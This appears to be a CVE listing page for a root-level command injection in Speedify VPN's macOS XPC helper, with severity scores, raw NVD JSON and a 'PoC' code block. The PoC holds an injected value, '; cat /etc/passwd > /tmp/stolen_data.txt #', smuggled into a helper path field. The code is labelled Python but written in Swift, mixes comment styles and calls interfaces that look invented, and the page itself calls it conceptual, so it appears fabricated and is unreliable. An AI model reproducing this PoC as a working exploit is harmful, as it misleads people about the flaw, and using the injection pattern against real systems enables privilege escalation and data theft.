Security Vulnerability Report
中文
CVE-2025-25364 CVSS 8.4 HIGH

CVE-2025-25364

Published: 2025-12-23 19:15:44
Last Modified: 2026-01-06 17:22:29

Description

A command injection vulnerability in the me.connectify.SMJobBlessHelper XPC service of Speedify VPN up to v15.0.0 allows attackers to execute arbitrary commands with root-level privileges.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:connectify:speedify:*:*:*:*:*:macos:*:* - VULNERABLE
Speedify VPN <= v15.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-25364 PoC - Speedify VPN SMJobBlessHelper Command Injection # This PoC demonstrates the command injection vulnerability in Speedify VPN's XPC service import Foundation // XPC Service Identifier for SMJobBlessHelper let serviceName = "me.connectify.SMJobBlessHelper" // Create XPC Connection let connection = NSXPCConnection(serviceName: serviceName) connection.resume() // Get the remote proxy let service = connection.remoteObjectProxyWithErrorHandler { error in print("XPC Connection Error: \(error)") } as? NSXPCProxyChecking // Malicious payload - command injection // Attackers can inject arbitrary shell commands through XPC message let maliciousCommand = "; cat /etc/passwd > /tmp/stolen_data.txt #" // Construct the exploit request let exploitRequest: [String: Any] = [ "action": "bless", "helperPath": maliciousCommand, "targetBundle": "/Applications/Speedify.app" ] // Send the malicious request to XPC service if let proxy = service { proxy.handleMessage(exploitRequest, reply: { response in if let result = response as? [String: Any], let success = result["success"] as? Bool, success { print("Exploit successful - command executed with root privileges") print("Stolen data saved to /tmp/stolen_data.txt") } }) } // Note: This is a conceptual PoC. Actual exploitation requires specific # conditions and proper XPC interface knowledge.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-25364", "sourceIdentifier": "[email protected]", "published": "2025-12-23T19:15:43.650", "lastModified": "2026-01-06T17:22:29.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability in the me.connectify.SMJobBlessHelper XPC service of Speedify VPN up to v15.0.0 allows attackers to execute arbitrary commands with root-level privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:connectify:speedify:*:*:*:*:*:macos:*:*", "versionEndIncluding": "15.0.0", "matchCriteriaId": "5DCD793E-0199-487E-A3E8-B7579EB8C8E3"}]}]}], "references": [{"url": "https://connectify.me", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://speedify.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://speedify.com/blog/news/speedify-macos-vpn-application-vulnerability/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}